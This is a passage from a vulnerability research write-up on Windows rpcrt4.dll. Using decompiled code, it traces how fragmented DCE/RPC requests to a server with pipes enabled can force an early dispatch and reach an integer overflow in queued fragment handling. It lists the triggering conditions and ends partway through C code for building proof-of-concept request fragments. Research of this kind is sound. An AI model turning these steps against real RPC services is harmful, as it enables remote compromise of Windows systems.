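            code[i + 2] == 0x38 && code[i + 3] == 0x02)
            return (long)i;
    }
    return -1;
}
```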


RPC_INTERFACE::RPC_INTERFACE
          (RPC_INTERFACE *this,_RPC_SERVER_INTERFACE *param_1,RPC_SERVER *param_2,uint param_3,
          uint param_4,uint param_5,FuncDef2 *param_6,void *param_7,long *param_8,
          RPCP_INTERFACE_GROUP *param_9)

{
  RPC_INTERFACE *pRVar1;
  int iVar2;
  int iVar3;
  
  *(undefined4 *)(this + 8) = 0;
  RtlInitializeCriticalSectionAndSpinCount(this + 0x10,0);
  *(undefined4 *)(this + 0x38) = 0;
  *(undefined4 *)(this + 200) = 0;
  pRVar1 = this + 0x170;
  *(undefined (**) [16])(this + 0xd8) = (undefined (*) [16])(this + 0xe8);
  *(undefined8 *)(this + 0xe0) = 4;
  *(undefined (*) [16])(this + 0xe8) = ZEXT816(0);
  *(undefined (*) [16])(this + 0xf8) = ZEXT816(0);
  *(undefined4 *)(this + 0x14c) = 0;
  *(undefined4 *)(this + 0x150) = 0;
  *(undefined4 *)(this + 0x154) = 0;
  *(undefined4 *)(this + 0x158) = 0;
  *(undefined4 *)(this + 0x15c) = 0;
  *(undefined4 *)(this + 0x160) = 0;
  *(undefined4 *)(this + 0x164) = 0;
  *(undefined4 *)(this + 0x168) = 0;
  *(undefined4 *)(this + 0x16c) = 0;
  RtlInitializeSRWLock(this + 0x1e0);
  *(RPC_INTERFACE **)(this + 0x178) = pRVar1;
  *(RPC_INTERFACE **)pRVar1 = pRVar1;
  *(undefined4 *)(this + 0x180) = 0;
  *(undefined4 *)(this + 0x1e8) = 0;
  *(undefined (**) [16])(this + 0x1f0) = (undefined (*) [16])(this + 0x200);
  *(undefined8 *)(this + 0x1f8) = 4;
  *(undefined (*) [16])(this + 0x200) = ZEXT816(0);
  *(undefined (*) [16])(this + 0x210) = ZEXT816(0);
  *(undefined4 *)(this + 0x220) = 0;
  *(undefined8 *)(this + 0x228) = 0;
  *(RPC_SERVER **)this = param_2;
  *(undefined8 *)(this + 0xd0) = 0;
  *(undefined8 *)(this + 0xb8) = 0;
  *(undefined8 *)(this + 0x230) = 0;
  *(undefined8 *)(this + 0x238) = 0;
  iVar3 = UpdateRpcInterfaceInformation
                    ((longlong)this,(uint *)param_1,(ushort **)(ulonglong)param_3,param_4,param_5,
                     (longlong)param_6,(ushort **)param_7,(longlong)param_9);
  iVar2 = *(int *)param_1;
  *param_8 = iVar3;
  if ((iVar2 == 0x60) && (((byte)param_1[0x58] & 1) != 0)) {
    *(uint *)(this + 0x38) = *(uint *)(this + 0x38) | 2;
  }
  return this;
}

The OR seems to be executed only under some conditions. At this point I needed to verify this assumption, so I set a breakpoint on those conditions at offset 0xd87c:


rpcrt4.dll + 0xd87c at RPC_INTERFACE::RPC_INTERFACE()
rpcrt4.dll + 0xb82e at InitializeRpcServer()
rpcrt4.dll + x      at PerformRpcInitialization()
rpcrt4.dll + y      at RpcServerUseProtseqEpW()


wchar_t ** InitializeRpcServer(undefined8 param_1,uchar **param_2,SIZE_T param_3)
{
    ...
      this_01 = (RPC_INTERFACE *)
                RPC_INTERFACE::RPC_INTERFACE
                          (this_00,(_RPC_SERVER_INTERFACE *)&DAT_1800e7470,GlobalRpcServer,1,0x4d2,
                           0x1000,(FuncDef2 *)0x0,(void *)0x0,(long *)local_res8,
                           (RPCP_INTERFACE_GROUP *)0x0);
    ...
}

The parameter on which the condition is checked is fixed, i.e. DAT_1800e7470, and never altered.


However, continuing with the debugger, I broke at the same point again, this time with another stack trace that starts exactly in my RPC server test!


rpcrt4.dll + 0xd87c  at RPC_INTERFACE::RPC_INTERFACE()
rpcrt4.dll + 0xd475  at RPC_INTERFACE * RPC_SERVER::FindOrCreateInterfaceInternal()
rpcrt4.dll + 0xd196  at void RPC_SERVER::RegisterInterface()
rpcrt4.dll + 0x7271e at void RpcServerRegisterIf()
RPCServerTest.exe: main

RPC_INTERFACE *
RPC_SERVER::FindOrCreateInterfaceInternal
          (RPC_SERVER *param_1,_RPC_SERVER_INTERFACE *param_2,ulonglong param_3,uint param_4,
          uint param_5,FuncDef2 *param_6,void *param_7,long *param_8,int *param_9,
          RPCP_INTERFACE_GROUP *param_10)

{
...
  pRVar5 = (RPC_INTERFACE *)AllocWrapper(0x240,p_Var8,uVar10);
  uVar2 = (uint)p_Var8;
  this = pRVar9;
  if (pRVar5 != (RPC_INTERFACE *)0x0) {
    p_Var8 = param_2;
    this = (RPC_INTERFACE *)
           RPC_INTERFACE::RPC_INTERFACE
                     (pRVar5,param_2,param_1,(uint)param_3,param_4,param_5,param_6,param_7,param_8,
                      param_10);
    uVar2 = (uint)p_Var8;
  }
...
}


void RPC_SERVER::RegisterInterface
               (RPC_SERVER *param_1,uint *param_2,uint *param_3,SIZE_T param_4,uint param_5,
               uint param_6,uint param_7,FuncDef2 *param_8,ushort **param_9,
               RPCP_INTERFACE_GROUP *param_10)

{
  ...
  RtlEnterCriticalSection(param_1);
  pRVar5 = FindOrCreateInterfaceInternal
                       (param_1,(_RPC_SERVER_INTERFACE *)param_2,(ulonglong)param_5,param_6,local_84
                        ,param_8,param_9,(long *)&local_80,(int *)&local_78,local_68);
  ...
}


void RpcServerRegisterIf(uint *param_1,uint *uuid,SIZE_T param_3)
{
  MUTEX *pMVar1;
  void *in_R9;
  undefined4 in_stack_ffffffffffffffc8;
  undefined4 in_stack_ffffffffffffffcc;
  
                    /* 0x726c0  1483  RpcServerRegisterIf */
  if ((RpcHasBeenInitialized != 0) ||
     (pMVar1 = PerformRpcInitialization
                         ((int)param_1,uuid,(int)param_3,in_R9,
                          (void *)CONCAT44(in_stack_ffffffffffffffcc,in_stack_ffffffffffffffc8)),
     (int)pMVar1 == 0)) {
    RPC_SERVER::RegisterInterface
              (GlobalRpcServer,param_1,uuid,param_3,0,0x4d2,gMaxRpcSize,(FuncDef2 *)0x0,
               (ushort **)0x0,(RPCP_INTERFACE_GROUP *)0x0);
  }
  return;
}

Basically, the condition failed because of the first parameter passed by my RPC server test application to RpcServerRegisterIf().

At this point I looked at my code to find which configuration I used and how I could change it in my test server app.

API prototype > 
  RPC_STATUS RpcServerRegisterIf(
    RPC_IF_HANDLE IfSpec,
    UUID          *MgrTypeUuid,
    RPC_MGR_EPV   *MgrEpv
  );

My RpcServerRegisterIf call > 
   status = RpcServerRegisterIf(interfaces_v1_0_s_ifspec,
        NULL,
        NULL);

Value of interfaces_v1_0_s_ifspec >
  static const RPC_SERVER_INTERFACE interfaces___RpcServerInterface =
    {
    sizeof(RPC_SERVER_INTERFACE),
    ,{1,0}},
    ,{2,0}},
    (RPC_DISPATCH_TABLE*)&interfaces_v1_0_DispatchTable,
    0, 
    0,
    0,
    &interfaces_ServerInfo,
    0x04000000 // param_1[0x58]
    };

Of course, the value of interfaces_v1_0_s_ifspec matches the one shown in the last debugger image! Since the failing check is on param_1[0x58] & 1, I changed 0x04000000 to 0x04000001 in order to get the vulnerable code executed!
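To double check the offset, the sketch below mirrors the RPC_SERVER_INTERFACE layout on x64 with pointer members reduced to void *, so it compiles outside the Windows SDK; the *_model names and interface_gets_flag2() are hypothetical. It shows that Length equals 0x60 and Flags sits at offset 0x58, matching the decompiled check. The tested bit 0x0001 appears to correspond to RPC_INTERFACE_HAS_PIPES in rpcdcep.h, so the change effectively marks the interface as one that uses pipes.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* RPC_SYNTAX_IDENTIFIER: 16-byte GUID + major/minor version, 20 bytes. */
typedef struct {
    uint8_t  uuid[16];
    uint16_t major, minor;
} syntax_id_model;

/* x64 layout mirror of RPC_SERVER_INTERFACE (pointers reduced to void *). */
typedef struct {
    uint32_t        Length;                  /* sizeof(RPC_SERVER_INTERFACE) */
    syntax_id_model InterfaceId;
    syntax_id_model TransferSyntax;
    void           *DispatchTable;
    uint32_t        RpcProtseqEndpointCount;
    void           *RpcProtseqEndpoint;
    void           *DefaultManagerEpv;
    const void     *InterpreterInfo;
    uint32_t        Flags;                   /* param_1[0x58] in the decompiled code */
} server_interface_model;

#define RPC_INTERFACE_HAS_PIPES 0x0001

/* Hypothetical helper: the condition guarding "flags |= 2" in
 * RPC_INTERFACE::RPC_INTERFACE(). */
bool interface_gets_flag2(const server_interface_model *s)
{
    return s->Length == 0x60 && (s->Flags & RPC_INTERFACE_HAS_PIPES) != 0;
}
```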


Note that this is not triggered by the client: in the previous screenshot the server is just configuring itself, and no client is connected to it. Finally, in BeginRpcCall() the check is satisfied.


The check inside ProcessReceivedPDU() is now satisfied too, but the vulnerable code is still not reached because of:

ulonglong OSF_SCALL::ProcessReceivedPDU (OSF_SCALL *this,dce_rpc_t *tcp_payload,uint len,int auth_fixed /* ? */)
{
    ...
          if ((*(int *)(this + 0x244) == 0) || (*(int *)(this + 0x1cc) != 0)) { // do not enter here!
            ...
          }
    ...
          else if (pkt_type == 0) { // packet is a request
            if (*(int *)(this + 0x214) == 0) { // should not enter here
            ...
            goto _OSF_SCALL::DispatchRPCCall // that handles the request
            }
            //vulnerable code
          }
          
  ...
}

The problem now is to find under which conditions (this + 0x214) is set. I had already seen that ActivateCall(), called every time an RPC call starts, sets *(this + 0x214) to 0. So, on the first call that value certainly cannot be different from 0.

I decided to dig a bit into the code just to better understand how messages are handled. Messages are processed according to the packet type defined in the DCERPC field (Reference) in the routine void OSF_SCONNECTION::ProcessReceiveComplete().

void OSF_SCONNECTION::ProcessReceiveComplete{

  if (pkt_type == 0) { // packet is a request
    if (*(int *)(this + 3) == 0) { // not investigated
        uVar6 = tcp_received->call_id;
        if (*(int *)((longlong)this + 0x17c) < (int)uVar6) { //should enter here if the call id is new, i.e. the packet refer to a new request
          ...
          ppvVar9 = (LPVOID *)OSF_SCALL::OSF_SCALL(puVar11,(longlong)this,(long *)pdVar18); // maybe instantiate the object to represent the call request
          ...
          iVar4 = OSF_SCALL::BeginRpcCall((longlong *)ppvVar9,tcp_received,ppOVar20);
          ...
        }
        else{
          ppvVar9 = (LPVOID *)FindCall((OSF_SCONNECTION *)this,uVar6); // call id already seen on this connection, so its call object should exist: FIND IT!
          if (ppvVar9 == (LPVOID *)0x0) { // not found: this is a new call id, so it should have the first fragment flag set and not reuse an already used call id?
            uVar6 = tcp_received->call_id;
            if (((int)uVar6 < *(int *)((longlong)this + 0x17c)) ||
               ((tcp_received->pkt_flags & 1U) == 0)) { // should not be 
              uVar6 = *(int *)((longlong)this + 0x17c) - uVar6;
              goto reach_fault?;
            }
            goto LAB_18009016d;
          }
call_processReceivedPDU: // call id object found just process new message
          uVar8 = OSF_SCALL::ProcessReceivedPDU((OSF_SCALL *)ppvVar9,tcp_received,uVar13,0);
          ...
        }
    }
    else
    {
        uVar6 = tcp_received->call_id;
        if ((*(byte *)&tcp_received->data_repres & 0xf0) != 0x10) {
          uVar6 = uVar6 >> 0x18 | (uVar6 & 0xff0000) >> 8 | (uVar6 & 0xff00) << 8 | uVar6 << 0x18;
        }
        if ((tcp_received->pkt_flags & 1U) == 0) {
          if (*(int *)((longlong)this + 0x1c) != 0) {
            uVar6 = *(int *)((longlong)this + 0x17c) - uVar6;
reach_fault?:
            if (0x95 < uVar6) goto goto_SendFAULT;
            goto LAB_180090122;
          }
        }
        else if (*(int *)((longlong)this + 0x1c) != 0) { // this+0x1c could be a flag true or false that says if the call id is new or not
          REFERENCED_OBJECT::AddReference((longlong)this,plVar15,pdVar18);
          *(undefined4 *)((longlong)this + 0x1c) = 0;
          *(uint *)((longlong)this + 0x17c) = uVar6;
          *(uint *)(this[0xf] + 0x1c8) = uVar6;
          iVar4 = OSF_SCALL::BeginRpcCall((longlong *)this[0xf],tcp_received,ppOVar20);
          goto LAB_18003d2b5;
        }
LAB_18008ffc1:
        uVar8 = OSF_SCALL::ProcessReceivedPDU((OSF_SCALL *)this[0xf],tcp_received,uVar13,0);
        iVar4 = (int)uVar8;
    }
    ...
  }
  ...
  if (tcp_received->pkt_type == '\x0b') { // Executed when the client send a BIND request
      if (this[9] != 0) {
        uVar3 = 0;
        goto LAB_18008ff47;
      }
      iVar4 = AssociationRequested((OSF_SCONNECTION *)this,tcp_received,uVar13,uVar6);
  }
  ...
}
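To make the header fields used above concrete (pkt_type, pkt_flags, data_repres, call_id), here is a minimal C sketch of the 16-byte DCE/RPC connection-oriented common header and a decoder for it. It applies the same test ProcessReceiveComplete() uses before byte-swapping call_id: a high nibble of 0x1 in the first data representation byte means little-endian, anything else is treated as big-endian. The struct and function names are my own and hypothetical; the layout and constants come from the DCE/RPC specification, not from rpcrt4.dll.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Packet types (PTYPE) from the DCE/RPC connection-oriented protocol. */
enum { PTYPE_REQUEST = 0x00, PTYPE_BIND = 0x0b };

/* pfc_flags bits that matter in this analysis. */
enum { PFC_FIRST_FRAG = 0x01, PFC_LAST_FRAG = 0x02, PFC_CONC_MPX = 0x10 };

/* 16-byte common header shared by all connection-oriented PDUs. */
typedef struct {
    uint8_t  rpc_vers, rpc_vers_minor, ptype, pfc_flags;
    uint8_t  drep[4];      /* drep[0] high nibble: 0x1 = little-endian integers */
    uint16_t frag_length;  /* whole fragment, header included */
    uint16_t auth_length;
    uint32_t call_id;
} co_header;

static uint16_t rd16(const uint8_t *p, int le) {
    return le ? (uint16_t)(p[0] | p[1] << 8) : (uint16_t)(p[0] << 8 | p[1]);
}

static uint32_t rd32(const uint8_t *p, int le) {
    return le ? (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24
              : (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | (uint32_t)p[3];
}

/* Decode a raw 16-byte header; (drep[0] & 0xf0) != 0x10 means big-endian. */
static co_header parse_co_header(const uint8_t *raw) {
    assert(raw != NULL);
    co_header h;
    int le = (raw[4] & 0xf0) == 0x10;
    h.rpc_vers = raw[0];
    h.rpc_vers_minor = raw[1];
    h.ptype = raw[2];
    h.pfc_flags = raw[3];
    for (int i = 0; i < 4; i++)
        h.drep[i] = raw[4 + i];
    h.frag_length = rd16(raw + 8, le);
    h.auth_length = rd16(raw + 10, le);
    h.call_id = rd32(raw + 12, le);
    return h;
}
```

A request with only PFC_FIRST_FRAG set is the "first but not last fragment" case handled further below; a bind has ptype 0x0b, the value ProcessReceiveComplete() checks before calling AssociationRequested().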

BeginRpcCall() ends up calling ProcessReceivedPDU(), which is the main function doing the packet parsing. This is what ProcessReceivedPDU() does when a request arrives as a single fragment (first and last fragment flags both set):

ulonglong OSF_SCALL::ProcessReceivedPDU (OSF_SCALL *this,dce_rpc_t *tcp_payload,uint len,int auth_fixed?){
  ...
        *(uint *)(this + 0x1d8) = local_res8[0]; // set the fragment len in the object
        *(char **)pdVar1 = tcp_payload->data;
        tcp_payload = pdVar14;
dispatchRPCCall:
                    /* if last frag set with first frag */
        *(undefined4 *)(this + 0x21c) = 3;
        if (((byte)this[0x2e0] & 4) != 0) {
          LOCK();
          *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) =
               *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) & 0xfffffffd;
          *(uint *)(this + 0x2e0) = *(uint *)(this + 0x2e0) & 0xfffffffb;
        }
        plVar13 = (longlong *)((ulonglong)tcp_payload & 0xffffffffffffff00 | (ulonglong)pkt_tyoe);
LAB_18003ad4f:
        uVar9 = DispatchRPCCall((longlong *)this,plVar13,puVar17); // process the remote call
        return uVar9;
  ...
}

And this is what it does when the first fragment of a request arrives with the last fragment flag unset:

ulonglong OSF_SCALL::ProcessReceivedPDU (OSF_SCALL *this,dce_rpc_t *tcp_payload,uint len,int auth_fixed?){
  ...
          /* it is not the last frag */
          uVar5 = tcp_payload->alloc_hint; // client suggest to the server how many bytes it will need to handle the full request
          if (uVar5 == 0) {
            *(uint *)(this + 0x248) = local_res8[0];
            uVar5 = local_res8[0]; // set to the frag len if alloc hint is 0
          }
          else {
            *(uint *)(this + 0x248) = uVar5;
          }
          puVar17 = (uint *)(ulonglong)uVar5;
      /* Could not allocate more than: (this +0x138)+0x148 = 0x400000 */
          if (*(uint *)(**(longlong **)(this + 0x138) + 0x148) <= uVar5 &&
              uVar5 != *(uint *)(**(longlong **)(this + 0x138) + 0x148)) { // check to avoid possible integer overflow
            piVar11 = local_80;
            uVar18 = 0x1072;
            local_80[0] = 3;
            local_78 = uVar5;
            goto goto_adderror_and_send_fault;
          }
          *(undefined4 *)(this + 0x1d8) = 0;
          pdVar14 = pdVar1;
      /* allocate buffer for all the fragments data */
          lVar7 = GetBufferDo((OSF_SCALL *)tcp_payload->data,(void **)pdVar1,uVar5,0,0, in_stack_ffffffffffffff60);
          if (lVar7 == 0) goto do_;
fail:
          pdVar14 = (dce_rpc_t *)0xe;
          goto cleanupAndSendFault;
  ...
}

long __thiscall
OSF_SCALL::GetBufferDo
          (OSF_SCALL *this,void **param_1,uint len,int param_3,uint param_4,ulong param_5)

{
  long lVar1;
  OSF_SCALL *pOVar2;
  OSF_SCALL *dst;
  ulonglong uVar3;
  OSF_SCALL *local_res8;
  
  local_res8 = this;
  lVar1 = OSF_SCONNECTION::TransGetBuffer((OSF_SCONNECTION *)this,&local_res8,len + 0x18);
  if (lVar1 == 0) {
    if (param_3 == 0) {
      *param_1 = local_res8 + 0x18;
    }
    else {
      uVar3 = (ulonglong)param_4;
      dst = local_res8 + 0x18;
      pOVar2 = dst;
      memcpy(dst,*param_1,param_4);
      if ((longlong)*param_1 - 0x18U != 0) {
        BCACHE::Free((ulonglong)pOVar2,(longlong)*param_1 - 0x18U,uVar3);
      }
      *param_1 = dst;
    }
    lVar1 = 0;
  }
  else {
    lVar1 = 0xe;
  }
  return lVar1;
}

If the received fragment is the first but not the last, a new buffer is allocated with GetBufferDo(). The check on the alloc hint (or on the fragment length, when the hint is 0) is interesting: the value cannot exceed 0x400000. This is very important because GetBufferDo() oddly allocates len + 0x18 bytes, so without the cap a 32-bit length close to 0xFFFFFFFF would make the allocation size wrap around to a tiny value.
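The arithmetic behind the cap can be sketched in C. This is a simplified model, not the rpcrt4.dll code: the function names are hypothetical, and I assume the limit read from (this + 0x138) + 0x148 is the constant 0x400000 observed in the debugger.

```c
#include <assert.h>
#include <stdint.h>

#define GETBUFFER_OVERHEAD 0x18u     /* GetBufferDo() asks TransGetBuffer() for len + 0x18 */
#define MAX_CALL_BUFFER    0x400000u /* assumed constant at (this + 0x138) + 0x148 */

/* Bytes requested for the first fragment, or 0 when ProcessReceivedPDU()
   would reject it (error 0x1072 in the decompiled code). */
static uint32_t first_fragment_request_size(uint32_t alloc_hint, uint32_t frag_len) {
    uint32_t want = alloc_hint != 0 ? alloc_hint : frag_len; /* hint 0 -> fragment length */
    if (want > MAX_CALL_BUFFER)
        return 0;
    return want + GETBUFFER_OVERHEAD; /* cannot wrap: want <= 0x400000 */
}

/* The same addition without the cap: a length near UINT32_MAX wraps around. */
static uint32_t unchecked_request_size(uint32_t len) {
    return len + GETBUFFER_OVERHEAD;
}
```

With the cap the largest request is 0x400018 bytes, while the unchecked version turns a length of 0xFFFFFFF0 into an 8-byte request.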

If the packet is neither the first nor the last fragment:

ulonglong OSF_SCALL::ProcessReceivedPDU (OSF_SCALL *this,dce_rpc_t *tcp_payload,uint len,int auth_fixed?){
  ...
                    /* should enter this branch */
        if (*(void **)pdVar1 != (void *)0x0) {
do_:
          uVar5 = local_res8[0];
          if ((*(int *)(this + 0x244) == 0) || (*(int *)(this + 0x1cc) != 0)) { // !RPC_INTERFACE_HAS_PIPES
            if ((*(int *)(this + 0x214) == 0) || (*(int *)(this + 0x1cc) != 0)) {
/* fragment len + current copied */
              uVar5 = local_res8[0] + *(uint *)(this + 0x1d8);
/* alloc_hint < already copied + fragment length */
              if (*(uint *)(this + 0x248) <= uVar5 && uVar5 != *(uint *)(this + 0x248)) {
                if (*(int *)(this + 0x1cc) != 0) goto LAB_18008ea09;
                *(uint *)(this + 0x248) = uVar5;
/* overflow check 0x400000 */
                puVar17 = (uint *)(**(OSF_SCALL ***)(this + 0x138) + 0x148);
                if (*puVar17 <= uVar5 && uVar5 != *puVar17) {
                  piVar11 = local_50;
                  uVar18 = 0x1073;
                  local_50[0] = 3;
                  local_48 = uVar5;
                  goto goto_adderror_and_send_fault;
                }
// reallocate because copied + fragment len exceeds the alloc hint sent with the first fragment!
                lVar7 = GetBufferDo(**(OSF_SCALL ***)(this + 0x138),(void **)pdVar1,uVar5,1,
                                    *(uint *)(this + 0x1d8),in_stack_ffffffffffffff60);
                if (lVar7 != 0) goto fail;
              }
              uVar5 = local_res8[0];
              puVar17 = (uint *)(ulonglong)local_res8[0];
//copy fragment data into the alloced buffer
              memcpy((void *)((longlong)*(void **)pdVar1 + (ulonglong)*(uint *)(this + 0x1d8)),tcp_payload->data,local_res8[0]);
              *(uint *)(this + 0x1d8) = *(int *)(this + 0x1d8) + uVar5;
              if ((pkt_flags & 2) == 0) {
                return 0; // if it is not the last fragment return 0
              }
              goto dispatchRPCCall; // dispatch the request only if it is the last fragment
            }
      }
      else if (pkt_tyoe == 0) {
    /* here if the packet type is 0, i.e. request */
        if (*(int *)(this + 0x214) == 0) {
          ...               
          uVar15 = GetBufferDo(**(OSF_SCALL ***)(this + 0x138),(void **)pdVar1,uVar15,1, *(uint *)(this + 0x1d8),in_stack_ffffffffffffff60);
          pdVar14 = (dce_rpc_t *)(ulonglong)uVar15;
          if (uVar15 != 0) goto cleanupAndSendFault;
          ...
              memcpy((void *)((ulonglong)*(uint *)(this + 0x1d8) + *(longlong *)(this + 0xe0)), tcp_payload->data,uVar5);
          ...
              *(uint *)(this + 0x1d8) = *(int *)(this + 0x1d8) + uVar5;
              (**(code **)(**(longlong **)(this + 0x130) + 0x40))();
              if (*(int *)(this + 0x1d8) != *(int *)(this + 0x248)) {
                return 0;
              }
              if ((pkt_flags & 2) == 0) {
                *(undefined4 *)(this + 0x230) = 0;
              }
              else {
                *(undefined4 *)(this + 0x21c) = 3;
                if (((byte)this[0x2e0] & 4) != 0) {
                  LOCK();
                  *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) =
                       *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) & 0xfffffffd;
                  *(uint *)(this + 0x2e0) = *(uint *)(this + 0x2e0) & 0xfffffffb;
                }
              }
              plVar13 = (longlong *)0x0;
              goto Dispatch_rpc_call;
        }
        else{
          ...
          /* store frag len */
          uVar5 = local_res8[0];
          iVar8 = QUEUE::PutOnQueue((QUEUE *)(this + 600),tcp_payload->data,local_res8[0]);
          if (iVar8 == 0) {
          /* integer overflow! */
          *(uint *)(this + 0x24c) = *(int *)(this + 0x24c) + uVar5;
          ...
        }
}

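Basically, when the pipe-related branch is not taken, middle fragments are just appended to the allocated buffer, which is reallocated whenever the accumulated length exceeds the alloc hint; the call is dispatched only when the last fragment arrives.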
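A simplified C model of that non-pipe path may help. The names are hypothetical, the 0x400000 cap is the value assumed above, and realloc() stands in for GetBufferDo(..., 1, copied), which allocates a new buffer, copies the old data and frees the old buffer. The buffer grows to copied + fragment length whenever that exceeds the alloc hint, the fragment is appended, and the call is dispatched only on the last fragment.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define MAX_CALL_BUFFER 0x400000u  /* assumed cap, see (this + 0x138) + 0x148 */

/* Hypothetical per-call reassembly state; comments give the decompiled offsets. */
typedef struct {
    uint8_t *buf;       /* *(void **)pdVar1 */
    uint32_t copied;    /* this + 0x1d8 */
    uint32_t capacity;  /* this + 0x248, initially the alloc hint */
} reassembly;

enum { FRAG_MORE = 0, FRAG_DISPATCH = 1, FRAG_FAULT = -1 };

static int append_fragment(reassembly *r, const uint8_t *data, uint32_t len, int last) {
    assert(r != NULL && data != NULL);
    uint32_t needed = r->copied + len;
    if (needed > r->capacity) {              /* alloc hint was too small: grow */
        if (needed > MAX_CALL_BUFFER)
            return FRAG_FAULT;               /* error 0x1073 in the decompiled code */
        uint8_t *grown = realloc(r->buf, needed);
        if (grown == NULL)
            return FRAG_FAULT;
        r->buf = grown;
        r->capacity = needed;
    }
    memcpy(r->buf + r->copied, data, len);
    r->copied = needed;
    return last ? FRAG_DISPATCH : FRAG_MORE; /* dispatch only on PFC_LAST_FRAG */
}
```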

DispatchRPCCall() seems to be the dispatcher for the complete request: it then calls the routines that handle the request, unmarshal the parameters and execute the remotely invoked procedure. Interestingly:

undefined8 OSF_SCALL::DispatchRPCCall(longlong *param_1,longlong *param_2,undefined8 param_3)
{
  if (*(int *)((longlong)param_1 + 0x1cc) < 1) {
    *(undefined4 *)((longlong)param_1 + 0x214) = 1;
    ...
}

*(int *)((longlong)param_1 + 0x1cc) seems to be zero, so the instruction `*(undefined4 *)((longlong)param_1 + 0x214) = 1;` is executed.


Is it possible to force a call to DispatchRpcCall() and still accept fragments for the same call id? The answer is yes!

Looking at ProcessReceivedPDU(), there is a path that executes DispatchRpcCall() without any last fragment being sent. The constraints are:

  1. Server configured with RPC_INTERFACE_HAS_PIPES -> the int at offset 0x58 of the RPC interface defined in the server has its lowest bit (0x1) set
  2. Client sends a first fragment, which initializes the call id object
  3. Client sends the second fragment with neither the first nor the last fragment flag set; this ends up calling DispatchRpcCall(), which sets param_1 + 0x214 to 1.
  4. The alloc hint sent by the client in the first fragment must equal the length of the copied buffer at the end of the second fragment.

This makes the code enter DispatchRpcCall() and causes the client's subsequent fragments to be handled by the buggy code.
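To check my understanding of the constraints, this C sketch models only the pipe branch of ProcessReceivedPDU() for request packets. The struct fields are named after the decompiled offsets, data copying is omitted, and everything else (names, return codes) is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical state of one call on a pipe interface; offsets from the decompiled code. */
typedef struct {
    uint32_t copied;      /* this + 0x1d8: bytes copied so far */
    uint32_t alloc_hint;  /* this + 0x248: alloc hint of the first fragment */
    int      dispatched;  /* this + 0x214: set to 1 by DispatchRpcCall() */
    uint32_t queued_len;  /* this + 0x24c: 32-bit running total of queued data */
    int      queued_cnt;  /* this + 0x264: number of queued packets */
} pipe_call;

enum { KEEP_READING, DISPATCHED, QUEUED };

/* One request fragment carrying frag_len data bytes; copying itself is omitted. */
static int on_request_fragment(pipe_call *c, uint32_t frag_len) {
    assert(c != NULL);
    if (!c->dispatched) {
        c->copied += frag_len;
        if (c->copied != c->alloc_hint)
            return KEEP_READING;   /* "return 0" in the decompiled code */
        c->dispatched = 1;         /* reached without PFC_LAST_FRAG */
        return DISPATCHED;
    }
    c->queued_len += frag_len;     /* unchecked add: wraps modulo 2^32 */
    c->queued_cnt++;               /* PutOnQueue() */
    return QUEUED;
}
```

With an alloc hint of 0x30, a first fragment of 0x10 bytes keeps the call reading, a second one of 0x20 bytes dispatches it without any last fragment flag, and every later fragment only grows the 32-bit queued total.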

ulonglong OSF_SCALL::ProcessReceivedPDU (OSF_SCALL *this,dce_rpc_t *tcp_payload,uint len,int auth_fixed?){
  ...
            else if (pkt_tyoe == 0) {
                    /* here if the packet type is 0, i.e. request */
            if (*(int *)(this + 0x214) == 0) {
              puVar17 = (uint *)(ulonglong)local_res8[0];
              uVar15 = *(uint *)(this + 0x1d8) + local_res8[0];
              ...
              if (*(int *)(this + 0x1d8) != *(int *)(this + 0x248)) { // cheat on this to make fragments appear as the last!
                // 0x1d8 contain already copied bytes until this request!
                // 0x248 contains the alloc hint!
                return 0;
              }
              if ((pkt_flags & 2) == 0) {
                *(undefined4 *)(this + 0x230) = 0;
              }
              else {
                *(undefined4 *)(this + 0x21c) = 3;
                if (((byte)this[0x2e0] & 4) != 0) {
                  LOCK();
                  *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) =
                       *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) & 0xfffffffd;
                  *(uint *)(this + 0x2e0) = *(uint *)(this + 0x2e0) & 0xfffffffb;
                }
              }
              plVar13 = (longlong *)0x0;
              goto Dispatch_rpc_call;
  ...
}

At this point it's possible to write a PoC that follows the previous constraints; I tested it against my own RPC server using the ncacn_np protocol sequence.
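On the client side, a request fragment is the 16-byte common header followed by alloc_hint (u32), the presentation context id (u16) and opnum (u16), then the stub data. This sketch serializes one little-endian fragment. The function name, context id, opnum and stub contents are hypothetical, and it covers neither the bind that must come first nor the ncacn_np transport. With alloc_hint set to 16 and two 8-byte fragments (the first with PFC_FIRST_FRAG, the second with no flags), it follows constraints 2 to 4 above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PTYPE_REQUEST  0x00
#define PFC_FIRST_FRAG 0x01
#define PFC_LAST_FRAG  0x02
#define REQ_HDR_LEN    24  /* common header + alloc_hint, p_cont_id, opnum */

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)v); put16(p + 2, (uint16_t)(v >> 16)); }

/* Serialize one little-endian request fragment without auth trailer.
   Returns the fragment length, or 0 if it does not fit in out or in the
   16-bit frag_length field. */
static size_t build_request_fragment(uint8_t *out, size_t out_size, uint8_t pfc_flags,
                                     uint32_t call_id, uint32_t alloc_hint,
                                     uint16_t ctx_id, uint16_t opnum,
                                     const uint8_t *stub, size_t stub_len) {
    assert(out != NULL);
    size_t total = REQ_HDR_LEN + stub_len;
    if (total > 0xFFFF || total > out_size)
        return 0;
    out[0] = 5;                       /* rpc_vers */
    out[1] = 0;                       /* rpc_vers_minor */
    out[2] = PTYPE_REQUEST;
    out[3] = pfc_flags;
    out[4] = 0x10;                    /* drep: little-endian integers, ASCII */
    out[5] = out[6] = out[7] = 0;     /* drep: IEEE floats, reserved */
    put16(out + 8, (uint16_t)total);  /* frag_length includes the header */
    put16(out + 10, 0);               /* auth_length */
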